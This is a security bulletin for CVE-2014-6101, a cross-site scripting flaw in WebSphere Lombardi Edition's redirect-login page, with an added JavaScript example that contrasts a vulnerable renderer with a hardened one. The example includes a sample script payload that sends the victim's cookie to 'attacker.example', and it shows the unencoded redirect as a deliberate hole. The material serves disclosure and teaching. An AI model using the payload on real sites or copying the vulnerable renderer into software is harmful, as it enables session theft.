History: Jun 15, 2018 - 7:02 a.m.

Security Bulletin: Cross-site scripting vulnerability in WebSphere Lombardi Edition redirect-login mechanism (CVE-2014-6101)

www.ibm.com

EPSS: 0.005 (percentile 76.5%)

Summary

WebSphere Lombardi Edition uses a mechanism to silently log in users who have previously authenticated themselves. This redirect-login mechanism is vulnerable to cross-site scripting attacks.

Vulnerability Details

CVE ID: CVE-2014-6101

**DESCRIPTION:** WebSphere Lombardi Edition is vulnerable to cross-site scripting, caused by improper validation of user-supplied input in the redirect-login mechanism. A remote attacker could exploit this vulnerability by constructing a specially crafted URL; once a user clicks the URL, the embedded script executes in that user's web browser within the security context of the hosting web site. An attacker could use this vulnerability to steal the user's cookie-based authentication credentials.

CVSS Base Score: 4.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96024> for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Affected Products and Versions

WebSphere Lombardi Edition V7.2

Remediation/Fixes

Install the interim fix for APAR IT04509 as appropriate for your current WebSphere Lombardi Edition version.

Workarounds and Mitigations

The attack requires a user to access a malicious URL that the attacker has constructed for this purpose. Advise your users not to click links of unknown or untrusted origin. This workaround reduces exposure but does not remove the flaw; apply the interim fix for APAR IT04509 to correct it.
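The following is an added illustration of the vulnerability class described in the Vulnerability Details and Workarounds sections above; it is not WebSphere Lombardi Edition code and the bulletin does not disclose the affected parameter or markup, so the handler shape, the `redirectUrl` parameter name and the page template are assumptions. It models a redirect-login page that reflects a user-controlled redirect target into HTML without encoding, beside a hardened version that validates the target as a same-origin path and HTML-encodes it before rendering.

```javascript
// Added example (not from the IBM bulletin or the product): a hypothetical
// "silent login" redirect page. Parameter name and markup are assumptions.

// Vulnerable: the redirect target is written into the page unencoded, so a
// crafted URL such as /login?redirectUrl="><script>...</script> breaks out
// of the attribute and runs script in the victim's browser on the site's origin.
function renderRedirectVulnerable(redirectUrl) {
  return `<html><head><meta http-equiv="refresh" content="0;url=${redirectUrl}"></head>` +
         `<body>Redirecting to <a href="${redirectUrl}">${redirectUrl}</a></body></html>`;
}

// HTML-encode the characters that can terminate an attribute or text context.
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Accept only a same-origin relative path: a leading "/" not followed by "/" or
// "\" (browsers treat "//host" and "/\host" as scheme-relative, i.e. an open
// redirect), and no control characters. Anything else falls back to a fixed path.
function safeRedirectTarget(redirectUrl, fallback = '/') {
  if (typeof redirectUrl !== 'string') return fallback;
  if (!/^\/(?![\/\\])[^\x00-\x1f\x7f]*$/.test(redirectUrl)) return fallback;
  return redirectUrl;
}

// Hardened: validate the target first, then encode it for the contexts it lands in.
function renderRedirectHardened(redirectUrl) {
  const target = htmlEscape(safeRedirectTarget(redirectUrl));
  return `<html><head><meta http-equiv="refresh" content="0;url=${target}"></head>` +
         `<body>Redirecting to <a href="${target}">${target}</a></body></html>`;
}

// True when the rendered page contains the attacker's payload verbatim, which is
// the reflected-XSS condition the bulletin describes.
function reflectsRaw(html, payload) {
  return html.includes(payload);
}

// Constructed payload modelled on the bulletin's cookie-theft scenario.
const SAMPLE_PAYLOAD =
  '"><script>document.location="http://attacker.example/?c="+document.cookie</script>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(reflectsRaw(renderRedirectVulnerable(SAMPLE_PAYLOAD), SAMPLE_PAYLOAD)); // true
  console.log(reflectsRaw(renderRedirectHardened(SAMPLE_PAYLOAD), SAMPLE_PAYLOAD));   // false
  console.log(safeRedirectTarget('//attacker.example/'));                              // "/"
  console.log(safeRedirectTarget('/teamworks/dashboard'));                             // "/teamworks/dashboard"
}
```

Validation does most of the work here: rejecting anything that is not a plain same-origin path removes both the script injection and the open-redirect variant of the same parameter, and the encoding step is the defence in depth for whatever still gets rendered. Rejecting absolute URLs to the application's own host is a deliberate simplification; if those must be allowed, parse the URL and compare the origin rather than pattern-matching the string.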
